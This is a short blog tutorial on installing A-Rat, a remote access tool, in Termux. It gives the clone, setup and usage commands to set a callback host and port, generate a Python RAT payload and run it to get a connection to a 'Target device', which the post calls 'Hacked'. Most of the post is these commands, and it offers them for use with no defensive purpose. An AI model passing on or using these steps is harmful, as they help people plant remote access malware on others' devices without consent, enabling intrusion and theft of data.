Saturday, 30 May 2020

Install A-Rat (Remote Access Tool) Exploit in Termux 2020 no root

Install and use A-Rat in Termux to remotely access Target device.

Install A-Rat (Remote Access Tool) Exploit in Termux 2020 no root

Hello, In this article you will learn how you can install and use A-Rat in your Termux.  By A-Rat you can generate python based Rat

installation :


  • apt update 
  • apt upgrade
  • apt install git
  • apt install python2
  • apt install python
  • git clone https://github.com/Xi4u7/A-Rat
  • cd A-Rat
  • chmod +x *


usage


  • python2 A-Rat.py
  • help
  • set host 127.0.0.1 [your ip]
  • set port 1337
  • set output /$HOME/rat.py
  • generate


It generates rat.py in termux home directory

Open termux new session

type $ ls

here you get that rat.py

go to again A-Rat means privious session of termux

Type run to start exploit.


  • $ run


and then open new session and run rat like this


  • $ python rat.py


and come back to A-Rat session 

Now its connected to that rat. means Hacked.

press control + c to stop.

If Face any difficulty let me know in the comment section.

Thanks For Visiting Akashyadavweb

1 comment